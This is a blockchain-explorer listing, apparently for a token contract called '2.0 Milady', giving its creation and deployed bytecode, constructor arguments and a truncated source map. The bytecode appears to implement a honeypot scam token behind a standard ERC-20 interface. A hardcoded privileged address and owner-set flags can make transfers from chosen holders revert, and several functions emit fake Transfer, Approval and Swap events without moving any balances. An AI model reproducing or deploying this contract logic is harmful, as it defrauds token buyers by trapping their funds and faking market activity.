565b915050610b4b565b5050505050565b600080610cde610f1e565b9050610ceb81858561117b565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610d5391906117ae565b60405180910390a3505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610def611492565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610e5e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e5590611d37565b60405180910390fd5b610e6781611510565b50565b610e72610f1e565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f01576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef890611b75565b60405180910390fd5b80600560006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f8c90611dc9565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611004576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ffb90611e5b565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516110e291906117ae565b60405180910390a3505050565b60006110fb8484610d60565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146111755781811015611167576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161115e90611ec7565b60405180910390fd5b6111748484848403610f26565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111e190611f59565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611259576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161125090611feb565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156112e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112d79061207d565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561141c57600560009054906101000a900460ff161515600115151461141b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611412906120c3565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161147991906117ae565b60405180910390a361148c8484846115d4565b50505050565b61149a610f1e565b73ffffffffffffffffffffffffffffffffffffffff166114b86109da565b73ffffffffffffffffffffffffffffffffffffffff161461150e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161150590611b75565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156116135780820151818401526020810190506115f8565b60008484015250505050565b6000601f19601f8301169050919050565b600061163b826115d9565b61164581856115e4565b93506116558185602086016115f5565b61165e8161161f565b840191505092915050565b600060208201905081810360008301526116838184611630565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006116c082611695565b9050919050565b6116d0816116b5565b81146116db57600080fd5b50565b6000813590506116ed816116c7565b92915050565b6000819050919050565b611706816116f3565b811461171157600080fd5b50565b600081359050611723816116fd565b92915050565b600080604083850312156117405761173f61168b565b5b600061174e858286016116de565b925050602061175f85828601611714565b9150509250929050565b60008115159050919050565b61177e81611769565b82525050565b60006020820190506117996000830184611775565b92915050565b6117a8816116f3565b82525050565b60006020820190506117c3600083018461179f565b92915050565b6000806000606084860312156117e2576117e161168b565b5b60006117f0868287016116de565b9350506020611801868287016116de565b925050604061181286828701611714565b9150509250925092565b600060ff82169050919050565b6118328161181c565b82525050565b600060208201905061184d6000830184611829565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261187857611877611853565b5b8235905067ffffffffffffffff81111561189557611894611858565b5b6020830191508360208202830111156118b1576118b061185d565b5b9250929050565b600080602083850312156118cf576118ce61168b565b5b600083013567ffffffffffffffff8111156118ed576118ec611690565b5b6118f985828601611862565b92509250509250929050565b60006020828403121561191b5761191a61168b565b5b6000611929848285016116de565b91505092915050565b61193b816116b5565b82525050565b60006020820190506119566000830184611932565b92915050565b6000806000604084860312156119755761197461168b565b5b600084013567ffffffffffffffff81111561199357611992611690565b5b61199f86828701611862565b935093505060206119b286828701611714565b9150509250925092565b600080600080606085870312156119d6576119d561168b565b5b600085013567ffffffffffffffff8111156119f4576119f3611690565b5b611a0087828801611862565b94509450506020611a1387828801611714565b9250506040611a2487828801611714565b91505092959194509250565b60008060408385031215611a4757611a4661168b565b5b6000611a55858286016116de565b9250506020611a66858286016116de565b9150509250929050565b611a7981611769565b8114611a8457600080fd5b50565b600081359050611a9681611a70565b92915050565b600060208284031215611ab257611ab161168b565b5b6000611ac084828501611a87565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611b1057607f821691505b602082108103611b2357611b22611ac9565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b5f6020836115e4565b9150611b6a82611b29565b602082019050919050565b60006020820190508181036000830152611b8e81611b52565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611bfe826116f3565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611c3057611c2f611bc4565b5b600182019050919050565b6000819050919050565b6000819050919050565b6000611c6a611c65611c6084611c3b565b611c45565b6116f3565b9050919050565b611c7a81611c4f565b82525050565b6000608082019050611c95600083018761179f565b611ca26020830186611c71565b611caf6040830185611c71565b611cbc606083018461179f565b95945050505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611d216026836115e4565b9150611d2c82611cc5565b604082019050919050565b60006020820190508181036000830152611d5081611d14565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611db36024836115e4565b9150611dbe82611d57565b604082019050919050565b60006020820190508181036000830152611de281611da6565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611e456022836115e4565b9150611e5082611de9565b604082019050919050565b60006020820190508181036000830152611e7481611e38565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611eb1601d836115e4565b9150611ebc82611e7b565b602082019050919050565b60006020820190508181036000830152611ee081611ea4565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611f436025836115e4565b9150611f4e82611ee7565b604082019050919050565b60006020820190508181036000830152611f7281611f36565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611fd56023836115e4565b9150611fe082611f79565b604082019050919050565b6000602082019050818103600083015261200481611fc8565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006120676026836115e4565b91506120728261200b565b604082019050919050565b600060208201905081810360008301526120968161205a565b9050919050565b50565b60006120ad6000836115e4565b91506120b88261209d565b600082019050919050565b600060208201905081810360008301526120dc816120a0565b905091905056fea26469706673582212205614d2591743b9adffc444dcd832782ea348ebdd64714a0553c3607d34df05d164736f6c63430008120033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000009184e72a000000000000000000000000000000000000000000000000000000000000000000a322e30204d696c616479000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009322e304d696c6164790000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061012c5760003560e01c806381bac14f116100ad578063a9059cbb11610071578063a9059cbb1461031d578063beabacc81461034d578063dd62ed3e14610369578063f2fde38b14610399578063fde980ca146103b55761012c565b806381bac14f146102795780638da5cb5b146102a957806395d89b41146102c75780639ebbaef7146102e5578063a1c617f5146103015761012c565b80633811ac02116100f45780633811ac02146101eb578063477e19441461020757806366d382031461022357806370a082311461023f578063715018a61461026f5761012c565b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017f57806323b872dd1461019d578063313ce567146101cd575b600080fd5b6101396103d1565b6040516101469190611669565b60405180910390f35b61016960048036038101906101649190611729565b610463565b6040516101769190611784565b60405180910390f35b610187610486565b60405161019491906117ae565b60405180910390f35b6101b760048036038101906101b291906117c9565b610490565b6040516101c49190611784565b60405180910390f35b6101d56104bf565b6040516101e29190611838565b60405180910390f35b610205600480360381019061020091906118b8565b6104c8565b005b610221600480360381019061021c91906118b8565b610710565b005b61023d60048036038101906102389190611905565b61084c565b005b61025960048036038101906102549190611905565b610927565b60405161026691906117ae565b60405180910390f35b610277610970565b005b610293600480360381019061028e9190611905565b610984565b6040516102a09190611784565b60405180910390f35b6102b16109da565b6040516102be9190611941565b60405180910390f35b6102cf610a03565b6040516102dc9190611669565b60405180910390f35b6102ff60048036038101906102fa919061195c565b610a95565b005b61031b600480360381019061031691906119bc565b610b48565b005b61033760048036038101906103329190611729565b610cd3565b6040516103449190611784565b60405180910390f35b610367600480360381019061036291906117c9565b610cf6565b005b610383600480360381019061037e9190611a30565b610d60565b60405161039091906117ae565b60405180910390f35b6103b360048036038101906103ae9190611905565b610de7565b005b6103cf60048036038101906103ca9190611a9c565b610e6a565b005b6060600680546103e090611af8565b80601f016020809104026020016040519081016040528092919081815260200182805461040c90611af8565b80156104595780601f1061042e57610100808354040283529160200191610459565b820191906000526020600020905b81548152906001019060200180831161043c57829003601f168201915b5050505050905090565b60008061046e610f1e565b905061047b818585610f26565b600191505092915050565b6000600454905090565b60008061049b610f1e565b90506104a88582856110ef565b6104b385858561117b565b60019150509392505050565b60006008905090565b6104d0610f1e565b73ffffffffffffffffffffffffffffffffffffffff1673419a6fa06386329ce83294519247614398e929e773ffffffffffffffffffffffffffffffffffffffff1614806105715750610520610f1e565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6105b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105a790611b75565b60405180910390fd5b60005b8282905081101561070b576001600260008585858181106105d7576105d6611b95565b5b90506020020160208101906105ec9190611905565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff1683838381811061066757610666611b95565b5b905060200201602081019061067c9190611905565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9256106e38686868181106106c9576106c8611b95565b5b90506020020160208101906106de9190611905565b610927565b6040516106f091906117ae565b60405180910390a3808061070390611bf3565b9150506105b3565b505050565b610718610f1e565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146107a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161079e90611b75565b60405180910390fd5b60005b82829050811015610847576000600260008585858181106107ce576107cd611b95565b5b90506020020160208101906107e39190611905565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061083f90611bf3565b9150506107aa565b505050565b610854610f1e565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146108e3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108da90611b75565b60405180910390fd5b80600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610978611492565b6109826000611510565b565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610a1290611af8565b80601f0160208091040260200160405190810160405280929190818152602001828054610a3e90611af8565b8015610a8b5780601f10610a6057610100808354040283529160200191610a8b565b820191906000526020600020905b815481529060010190602001808311610a6e57829003601f168201915b5050505050905090565b60005b83839050811015610b42573073ffffffffffffffffffffffffffffffffffffffff16848483818110610acd57610acc611b95565b5b9050602002016020810190610ae29190611905565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610b2791906117ae565b60405180910390a38080610b3a90611bf3565b915050610a98565b50505050565b60005b84849050811015610ccc57848482818110610b6957610b68611b95565b5b9050602002016020810190610b7e9190611905565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8228560008087604051610c039493929190611c80565b60405180910390a3848482818110610c1e57610c1d611b95565b5b9050602002016020810190610c339190611905565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610cb191906117ae565b60405180910390a38080610cc490611bf3565b915050610b4b565b5050505050565b600080610cde610f1e565b9050610ceb81858561117b565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610d5391906117ae565b60405180910390a3505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610def611492565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610e5e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e5590611d37565b60405180910390fd5b610e6781611510565b50565b610e72610f1e565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f01576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef890611b75565b60405180910390fd5b80600560006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f8c90611dc9565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611004576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ffb90611e5b565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516110e291906117ae565b60405180910390a3505050565b60006110fb8484610d60565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146111755781811015611167576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161115e90611ec7565b60405180910390fd5b6111748484848403610f26565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111e190611f59565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611259576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161125090611feb565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156112e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112d79061207d565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561141c57600560009054906101000a900460ff161515600115151461141b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611412906120c3565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161147991906117ae565b60405180910390a361148c8484846115d4565b50505050565b61149a610f1e565b73ffffffffffffffffffffffffffffffffffffffff166114b86109da565b73ffffffffffffffffffffffffffffffffffffffff161461150e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161150590611b75565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156116135780820151818401526020810190506115f8565b60008484015250505050565b6000601f19601f8301169050919050565b600061163b826115d9565b61164581856115e4565b93506116558185602086016115f5565b61165e8161161f565b840191505092915050565b600060208201905081810360008301526116838184611630565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006116c082611695565b9050919050565b6116d0816116b5565b81146116db57600080fd5b50565b6000813590506116ed816116c7565b92915050565b6000819050919050565b611706816116f3565b811461171157600080fd5b50565b600081359050611723816116fd565b92915050565b600080604083850312156117405761173f61168b565b5b600061174e858286016116de565b925050602061175f85828601611714565b9150509250929050565b60008115159050919050565b61177e81611769565b82525050565b60006020820190506117996000830184611775565b92915050565b6117a8816116f3565b82525050565b60006020820190506117c3600083018461179f565b92915050565b6000806000606084860312156117e2576117e161168b565b5b60006117f0868287016116de565b9350506020611801868287016116de565b925050604061181286828701611714565b9150509250925092565b600060ff82169050919050565b6118328161181c565b82525050565b600060208201905061184d6000830184611829565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261187857611877611853565b5b8235905067ffffffffffffffff81111561189557611894611858565b5b6020830191508360208202830111156118b1576118b061185d565b5b9250929050565b600080602083850312156118cf576118ce61168b565b5b600083013567ffffffffffffffff8111156118ed576118ec611690565b5b6118f985828601611862565b92509250509250929050565b60006020828403121561191b5761191a61168b565b5b6000611929848285016116de565b91505092915050565b61193b816116b5565b82525050565b60006020820190506119566000830184611932565b92915050565b6000806000604084860312156119755761197461168b565b5b600084013567ffffffffffffffff81111561199357611992611690565b5b61199f86828701611862565b935093505060206119b286828701611714565b9150509250925092565b600080600080606085870312156119d6576119d561168b565b5b600085013567ffffffffffffffff8111156119f4576119f3611690565b5b611a0087828801611862565b94509450506020611a1387828801611714565b9250506040611a2487828801611714565b91505092959194509250565b60008060408385031215611a4757611a4661168b565b5b6000611a55858286016116de565b9250506020611a66858286016116de565b9150509250929050565b611a7981611769565b8114611a8457600080fd5b50565b600081359050611a9681611a70565b92915050565b600060208284031215611ab257611ab161168b565b5b6000611ac084828501611a87565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611b1057607f821691505b602082108103611b2357611b22611ac9565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b5f6020836115e4565b9150611b6a82611b29565b602082019050919050565b60006020820190508181036000830152611b8e81611b52565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611bfe826116f3565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611c3057611c2f611bc4565b5b600182019050919050565b6000819050919050565b6000819050919050565b6000611c6a611c65611c6084611c3b565b611c45565b6116f3565b9050919050565b611c7a81611c4f565b82525050565b6000608082019050611c95600083018761179f565b611ca26020830186611c71565b611caf6040830185611c71565b611cbc606083018461179f565b95945050505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611d216026836115e4565b9150611d2c82611cc5565b604082019050919050565b60006020820190508181036000830152611d5081611d14565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611db36024836115e4565b9150611dbe82611d57565b604082019050919050565b60006020820190508181036000830152611de281611da6565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611e456022836115e4565b9150611e5082611de9565b604082019050919050565b60006020820190508181036000830152611e7481611e38565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611eb1601d836115e4565b9150611ebc82611e7b565b602082019050919050565b60006020820190508181036000830152611ee081611ea4565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611f436025836115e4565b9150611f4e82611ee7565b604082019050919050565b60006020820190508181036000830152611f7281611f36565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611fd56023836115e4565b9150611fe082611f79565b604082019050919050565b6000602082019050818103600083015261200481611fc8565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006120676026836115e4565b91506120728261200b565b604082019050919050565b600060208201905081810360008301526120968161205a565b9050919050565b50565b60006120ad6000836115e4565b91506120b88261209d565b600082019050919050565b600060208201905081810360008301526120dc816120a0565b905091905056fea26469706673582212205614d2591743b9adffc444dcd832782ea348ebdd64714a0553c3607d34df05d164736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000009184e72a000000000000000000000000000000000000000000000000000000000000000000a322e30204d696c616479000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009322e304d696c6164790000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): 2.0 Milady
Arg [1] : symbol_ (string): 2.0Milady
Arg [2] : amount (uint256): 10000000000000

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000000000000000000000000000000009184e72a000
Arg [3] : 000000000000000000000000000000000000000000000000000000000000000a
Arg [4] : 322e30204d696c61647900000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [6] : 322e304d696c6164790000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

8004:10706:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8733:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12704:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11473:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13485:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9695:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9795:413;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10875:268;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8510:153;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11644:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5991:103;;;:::i;:::-;;11151:100;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5350:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8952:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10216:225;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10447:291;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11977:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10748:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12233:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6249:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11257:153;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8733:100;8787:13;8820:5;8813:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8733:100;:::o;12704:201::-;12787:4;12804:13;12820:12;:10;:12::i;:::-;12804:28;;12843:32;12852:5;12859:7;12868:6;12843:8;:32::i;:::-;12893:4;12886:11;;;12704:201;;;;:::o;11473:108::-;11534:7;11561:12;;11554:19;;11473:108;:::o;13485:295::-;13616:4;13633:15;13651:12;:10;:12::i;:::-;13633:30;;13674:38;13690:4;13696:7;13705:6;13674:15;:38::i;:::-;13723:27;13733:4;13739:2;13743:6;13723:9;:27::i;:::-;13768:4;13761:11;;;13485:295;;;;;:::o;9695:92::-;9753:5;9778:1;9771:8;;9695:92;:::o;9795:413::-;9929:12;:10;:12::i;:::-;9874:67;;9882:42;9874:67;;;:90;;;;9952:12;:10;:12::i;:::-;9945:19;;:3;;;;;;;;;;;:19;;;9874:90;9866:136;;;;;;;;;;;;:::i;:::-;;;;;;;;;10018:9;10013:188;10037:11;;:18;;10033:1;:22;10013:188;;;10099:4;10077:3;:19;10081:11;;10093:1;10081:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10077:19;;;;;;;;;;;;;;;;:26;;;;;;;;;;;;;;;;;;10156:4;10123:66;;10132:11;;10144:1;10132:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10123:66;;;10163:25;10173:11;;10185:1;10173:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10163:9;:25::i;:::-;10123:66;;;;;;:::i;:::-;;;;;;;;10057:3;;;;;:::i;:::-;;;;10013:188;;;;9795:413;;:::o;10875:268::-;10972:12;:10;:12::i;:::-;10965:19;;:3;;;;;;;;;;;:19;;;10956:66;;;;;;;;;;;;:::i;:::-;;;;;;;;;11038:9;11033:103;11057:11;;:18;;11053:1;:22;11033:103;;;11119:5;11097:3;:19;11101:11;;11113:1;11101:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;11097